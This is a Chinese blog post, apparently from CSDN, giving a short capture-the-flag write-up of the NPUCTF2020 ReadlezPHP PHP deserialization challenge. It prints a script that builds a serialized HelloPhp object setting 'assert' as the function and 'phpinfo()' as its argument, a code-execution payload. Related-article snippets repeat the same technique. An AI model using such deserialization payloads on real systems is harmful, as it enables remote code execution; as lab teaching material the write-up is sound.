【反序列化】ReadlezPHP

最新推荐文章于 2023-11-27 22:17:15 发布
最新推荐文章于 2023-11-27 22:17:15 发布
阅读量229 收藏
点赞数
分类专栏: 反序列化 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/121317847
版权

1.打开网页,无法右键查看源代码,在url中输入view-source查看:

2. 进入time.php?source查看到反序列化函数:

 3.可以读取到echo的结果是$b($a),构造序列化函数:

<?php
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = 'phpinfo()';
        $this->b = "assert";
    }
}
$c=new HelloPhp;
echo serialize($c);

//O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

malloc_冲!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NPUCTF2020]ReadlezPHP与assert函数利用
sGanYu
11-23 3067
在URL前添加view-source:即可查看源码 点击/time.php?source跳转如下页面 创建一个HelloPhp类和两个变量$a和$b,将a初始赋值"Y-m-d h:i:s",b初始赋值"date",最后输出$b($a),显然b括号包含a,如果将b赋值为函数,a赋值为命令,是否可以执行需要的命令呢?如果以get方式提交source则终止程序,以get方式提交的data则反序列化data,所以我们需要传入序列化后的值执行我们需要的命令 我们将a更改为phpinfo(),b更改为...
[NPUCTF2020]ReadlezPHP
wp568的博客
08-15 239
2. HelloPhp这个类的析构函数会执行echo $b($a)代码,当b=system,a=phpinfo()时,会执行函数查看到phpinfo界面。3. 可以构建HelloPhp的序列化字符串,data传入时反序列化就会执行析构函数。获取HelloPhp类的序列化字符串:这里屏蔽了system,改用了assert。1. 需要我们输入data参数,之后将data参数反序列化执行。查看phpinfo获取到flag。
web:[NPUCTF2020]ReadlezPHP
sleepywin的博客
11-27 319
并在构造函数中将它们分别初始化为字符串 "Y-m-d h:i:s" 和 "date"。函数将当前文件的源代码高亮显示并输出,然后终止程序。然后,通过判断 GET 请求中是否包含参数。符号将可能产生的错误屏蔽,防止错误信息泄露。这段代码是一个简单的 PHP 类,名为。,它在对象销毁时被调用。猜测可能是过滤了部分函数,尝试用别的。发现一个网址,访问这个页面查看。参数反序列化为对象,并使用。没发现其他的线索,查看源代码。函数将 GET 请求中的。类中还定义了一个析构函数。之后的代码中,创建了一个。
[NPUCTF2020]ReadlezPHP【web系列】
shutTD的博客
10-05 408
打开题目发现是一个帅帅的界面发现没什么有用的,那就f12康康有什么有用的,仔细查看每一个标签发现有一个网址我们跟着点进去一看发现是一段源代码,那这里就是解题的入口了看到就知道这道题是php反序列化了,所以接下来就是php反序列化做题流程。这题反序列化链很短,入口即终点,我们跟进发现那么这里就是个危险函数了也是我们的解题的最终步骤,在这里我们就需要认识一个函数了。
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
反序列化工具
11-14
Java反序列化是一种将已序列化的对象状态转换回对象的过程,通常用于持久化数据或在网络间传输对象。在Java中,这个过程涉及到`ObjectInputStream`类的`readObject()`方法,它能够读取由`ObjectOutputStream`的`...
c#序列化和反序列化
05-24
什么叫反序列化? 就是再把介质中的东西还原成对象,把石子还原成人的过程。 在进行这些操作的时候都需要这个可以被序列化,要能被序列化,就得给类头加[Serializable]特性。 通常网络程序为了传输安全才这么做。不...
序列化与反序列化
12-21
序列化与反序列化 概述 序列化: 就是使用流的技术将对象中的数据保存到文件中。 反序列化: 就是使用流的技术将文件中的数据读取到对象中。 使用到的流技术 序列化:ObjectOutputStream 反序列化:...
C# xml序列化和反序列化
最新发布
01-05
在C#编程中,XML序列化和反序列化是一项重要的技术,它允许我们将对象的状态转换为XML格式的数据,以及将XML数据恢复为等效的对象。这在数据存储、网络传输和配置文件等方面都有广泛的应用。以下是对这个主题的详细...
[NPUCTF2020]ReadlezPHP 此题有两个flag哦
Eason_LYC安全白帽子的成长博客
08-04 955
[NPUCTF2020]ReadlezPHP,其实有两个flag哦
[NPUCTF2020]ReadlezPHP 1
shinygod的博客
03-21 1516
知识点:assert和eval的不同 call_user_func 回调函数 分析 ctrl+u看源码 这题应该是要构造序列化来通过echo $b($a);拿flag,不过flag在phpinfo里我是真没想到。 payload 序列化: <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this-&gt
mysql inner join 和join_mysql中的7种联表join
weixin_39703773的博客
12-01 126
建表在这里呢我们先来建立两张有外键关联的张表。CREATE DATABASE db0206;USE db0206;CREATE TABLE `db0206`.`tbl_dept`( `id` INT(11) NOT NULL AUTO_INCREMENT, `deptName` VARCHAR(30), `locAdd` VARCHAR(40), PRIMARY KEY (`id...
BUUCTF--ReadlezPHP反序列化简单应用)()
cainiao17441898的博客
08-15 248
目录扫描之后发现没有文件泄露。 查看一下源码发现了两个链接。 源码: PHP魔术方法:magic 这里eval没有用了不知道为啥(可能被过滤了吧)。 这里用了assert截断函数(作用跟eval差不多,eval里面的语句要以;结尾) 这里用蚁剑连接会连不上,就先查看一下phpinfo的信息。 生成payload: <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function
Java对象序列化与反序列化详解
"Java对象序列化与反序列化是将Java对象转化为二进制字节流,以便存储或在网络中传输。此过程涉及到Serializable和Externalizable接口,以及ObjectOutputStream和ObjectInputStream类。" 在Java中,对象的序列化是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值